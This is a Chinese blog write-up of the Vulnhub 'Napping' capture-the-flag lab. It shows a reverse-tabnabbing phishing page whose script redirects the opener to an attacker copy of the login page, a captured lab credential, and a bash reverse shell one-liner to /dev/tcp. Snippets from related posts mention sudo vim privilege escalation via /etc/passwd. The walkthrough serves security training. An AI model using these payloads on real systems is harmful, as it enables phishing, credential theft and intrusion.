Napping靶场实战

最新推荐文章于 2025-12-28 16:49:38 发布
原创 最新推荐文章于 2025-12-28 16:49:38 发布 · 311 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络 #运维

通过nmap搜索到靶机ip和开放端口,我们尝试访问80端口

发现是登录界面且可以注册,我们注册尝试

登录后发现可以提交页面,提交完链接后点击here即可跳转到链接界面

查了下发现使用a标签和target=_blank可以构成Reverse Tabnabbing钓鱼

在/var/www/html目录下放两个html文件,一个为站点首页(index.html),一个为钓鱼界面(test.html)

在kali上wget下载的网站首页文件为.php,需要重命名为.html

wget http://172.16.2.74/index.php
mv index.php index.html

vim test.html
<!DOCTYPE html>
<html>
<body>
    <script>
    	if(window.opener) window.opener.parent.location.replace('http://192.168.1.100:666/index.html');
    	if(window.opener  != window)  window.opener.parent.location.replace('http://192.168.1.100:666/index.html');
    </script>
</body>
</html>

访问kali下的网页,需要开启http服务
并在kali监听端口,监听的端口为钓鱼页面里链接的端口

在输入链接处,提交创建的钓鱼页面,过个两三分钟后,返回了数据包

在返回的信息中发现了账号密码,密码这里需要url解码一下


daniel/C@ughtm3napping123,登录到daniel账号

进行反弹shell

bash -c 'bash -i >& /dev/tcp/172.16.2.71/6666 0>&1'

成功

Paper_F1nd
关注
打靶分享:Napping
weixin_66249173的博客
02-01 908
所以,根据钓鱼漏洞的利用原理目前的思路就是在这里输入一个能够访问攻击机的链接,且该链接可以访问shell.html这一文件,而在shell文件中需要指向一个正常的网页,b.html。2.在提权时要能够找到query.py文件,并且能够发现此文件与site_status.txt的关系。9001端口是用来监听a.html网页的返回信息的。555端口是用来访问攻击机Kali中的shell.html文件的。发现有22和80两个端口,访问一下80端口。意思是所有链接都可以提交,随便提交一个链接查看页面源码。
Vulnhub napping-1.0.1靶机攻击实战(一)
初学者
02-08 975
到这里,就算获得了root的权限了,那么这里有人会问,为什么我们拿到了daniel用户的权限,不直接通过这个用户提权反而是要通过adrian用户建立反射shell进行提权呢?这个问题有兴趣的读者可以深入研究一下。
Vulnhub靶场:NAPPING: 1.0.1
weixin_69670995的博客
06-05 1564
发现a连接出现了刚刚输入的url,猜测这是一个社工,可以写一个钓鱼页面,新建一个b.html文件,将下面的代码写入。将靶机导入到Oracle VM VirtualBox中,网络设置仅主机模式,和kali使用相同的网卡。发现该py程序每两分钟执行一次,这里在用户的家目录下新建一个shell.sh文件。然后新建一个a.html文件,下面代码写入(写一个正常的页面就行)发现一个a连接,输入一个url再次查看网页源代码。发现22端口和80端口,使用浏览器访问80端口。发现是一个登陆页面,首先进行注册。
【Vulnhub靶场NAPPING: 1.0.1
DG_s1mple
04-01 6703
环境准备 下载靶机导入到vmware 攻击机IP地址为:192.168.2.18 靶机IP地址为:192.168.2.16 信息收集 我们使用nmap扫描一下靶机开放的端口信息 靶机开放了ssh跟http服务 我们首先访问一下他的http服务 是一个登录界面,并且可以注册账号,我们先注册一下 有一个文本框,我们测试一下功能 发现我们输入什么网站,他就跳转到什么网站,这么会存在Tabnabbing攻击 使用正常网站A的a标签设置为恶意网站B,恶意网站B中利用window.opener修改原先页面
NAPPING: 1.0.1靶场(Vulnhub系列)
m0_73062138的博客
05-03 994
因此,Raskin将此手法称为标签绑架(tabnapping),他指出当使用者连上一个嵌有第三方script程序或Flash工具的网页时,就会让自己曝露于风险中,因为相关的恶意软件得以侦测使用者经常使用或正在使用的网络服务,在用户暂时离开该网页后,该网页内容及网页标签会悄悄地变身成为伪造的网络服务,并诱导用户输入个人信息。发现是个登录框,进行了简单的漏洞探测,发现没什么可以利用的点,变进行了目录扫描,但是也没有发现可以利用的点。等标签里的一个属性设置,它的作用是规定链接或者表单提交之后的页面打开方式。
vulnhub靶场6:napping
Genarior的专栏
05-16 320
8、find / -group administrators -type f 2>/dev/null 查看有相同权限的文件 ,发现了一个query.py。6、启动python3 -m http.server 80 监听,同步nc -lvvp 8000端口监听,获得了账号密码。10、获得反弹shell,查看sudo可执行命令,可以无需密码root权限执行vim。使用sudo vim 修改/etc/passwd文件添加用户。13、使用sudo vim修改/etc/shadow文件。7、ssh登录,查看权限。
NAPPING
10-24
标题"NAPPING"可能指的是一个与字体设计或者艺术相关的项目,因为"字体"是给定的标签之一。在IT行业中,字体通常涉及到用户界面(UI)设计、网页设计、图形设计等领域,是信息传达的重要组成部分。字体的选择和设计...
【java入门到放弃】网络
最新发布
WZDBXHNL的博客
12-28 643
防火墙既可以是硬件,也可以是软件,本质上是一种,而不是只能对应某一种形态。
做了一块可以调用百度云语音识别api和tts api的esp32 s3开发板,支持跑ai小智机器人的源码,基于idf5.5.1库编译,分享下
net3m33的专栏
12-25 902
做了一块可以调用百度云语音识别api和语音合成tts接口的esp32 s3开发板,支持跑ai小智机器人的源码,基于idf5.5.1库编译,分享
OSI与TCP/IP:网络协议栈深度解析
m0_62928331的博客
12-23 756
【代码】OSI与TCP/IP:网络协议栈深度解析。
手写TCP/IP协议栈——实现ping响应不可达
Tandy12356_的博客
12-27 424
打开Tftp32软件,选择Tftp Client选项,配置目的主机的IP地址,下面几个内容随便填。对方检查校验和出现问题就直接丢包了,不会给我们回应,但是可以使用wireshark提醒。同时对于TCP和UDP的校验和检查也可以提前勾选上(后面会用到)编辑 -> 首选项 -> 协议 -> IPV4 勾上校验和检查。wireshark抓包ICMP不可达响应截图。点击Get之后可以向目的主机发送请求。
无响应的状态码分析
Vincent0sen的博客
12-24 545
Langflow 处理某些 Flow 时,如果调用了底层的 C++ 库(如向量数据库 Chroma、Faiss 或某些 Transformer 算子),由于版本不兼容或内存非法访问,Python 解释器会直接**“闪崩”**。如果你的请求体(Payload)非常大,或者包含了某些可能被误认为攻击的特殊字符,本地的防火墙或安全软件可能会在连接中途强制注入一个 RST 包断开连接。如果 postgres 容器响应极慢,或者 SQLAlchemy 在某些极端并发下导致主线程挂起并超时断开连接,也可能出现此错误。
Linux系统编程(网络编程)
m0_64823929的博客
12-24 383
sudo vim /etc/network/interfaces 虚拟机网络配置文件 ,设置ip(手动分配,或自动分配)。ifconfig ens33 192.168.0.13/24 up 临时设置本机ip地址,重启后失效。sudo /etc/init.d/networking restart 进行网络设置的加载,ip地址版本, V4(主流) V6(未来的方向)传输层 ====》端口号tcp udp。接口层 ====》网卡 驱动 1GB。网络层 ====》IP 地址。应用层 ====》应用程序。
c#Socket学习,使用Socket创建一个在线聊天,日志笔记(5)
学不会shader
12-25 1047
32位整数:0x12345678高位字(High Word):0x1234(高16位)低位字(Low Word):0x5678(低16位)64位整数:0x123456789ABCDEF0高位双字(High Dword):0x12345678(高32位)低位双字(Low Dword):0x9ABCDEF0(低32位)
FW基本概述
汤小萌的博客
12-26 769
1. 基于五元组的访问控制(最基础且核心)这是防火墙策略的基石。源IP地址目的IP地址源端口号目的端口号协议类型(如TCP、UDP、ICMP)通过这五元组,防火墙可以制定极其精细的策略,例如:“只允许财务部的IP段访问服务器的TCP 443端口,其他一律拒绝2. 基于用户/用户组的控制现代防火墙能将IP地址与具体用户身份绑定。策略可以写成:“允许‘市场部员工组’在上班时间访问‘社交媒体应用类’”,而不是写一串复杂的IP地址。这大大提升了策略的可读性和管理效率。
白帽系列01: 抓包
JoStudio
12-26 881
WhiteHat是一个Java网络抓包分析库,支持TCP/UDP等协议的数据包捕获与发送。使用前需安装WinPcap/libpcap依赖库。通过Maven引入依赖后,只需3步即可实现抓包功能:打开网卡、定义处理程序、开始抓包。支持BPF过滤表达式、数据包转存为.pcap文件,并提供ARP/ICMP/DNS/DHCP等协议处理示例。特别提供高效的IP网段扫描(5000IP/秒)和端口扫描(5000端口/秒)功能,速度优于nmap。最后提出两个实践场景:办公室设备状态监测和智能WIFI访客感知。
spring boot 运行测试类时:Error creating bean with name ‘serverEndpointExporter‘ 问题
csdndd521的博客
12-26 200
这个在Websocket中,注入不进去,单元测试时报错。直接在@SpringBootTest加入。
docker自定义网络-简单总结
一寸一寸光阴
12-28 339
1.连接的IP地址为安装docker的服务器地址,确保该容器的对外暴露的端口已经去掉防火墙啥的,否则外部电脑连接不上,如在某一个linux服务器安装了docker,并在docker中启动了mysql容器应用,且这个mysql容器应用在linux服务器暴露的端口是3306,确保这个linux服务器3306端口已经开放防火墙规则,否则在windows电脑上连接这个linux服务器的3306的mysql服务是连接不成功的。如果IP地址为一些云服务器,确定使用公网IP地址,否则也连接不上。
一次完整的网络故障排查思路拆解:从“现象”到“根因”的系统方法
villison1010的博客
12-24 393
摘要:网络运维的核心差距在于故障排查的系统性思维。本文提出结构化排障四步法:1)验证问题真实性;2)判断影响范围;3)按物理层→二层→三层→策略层逐层排查;4)验证假设。强调先定位问题层级(70%偶发问题在物理层)再定位设备,避免经验主义导致的"越查越乱"。建议建立可复用的排障模型,每次故障后沉淀排查路径和关键信号,将经验转化为系统性能力。
如何删除导入napping
05-26
如果您想删除已导入的Python模块`napping`,可以使用以下命令: ``` pip uninstall napping ``` 这将从Python环境中删除`napping`模块及其依赖项。请注意,您需要在命令行中执行此命令,并确保您具有足够的权限来卸载模块。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值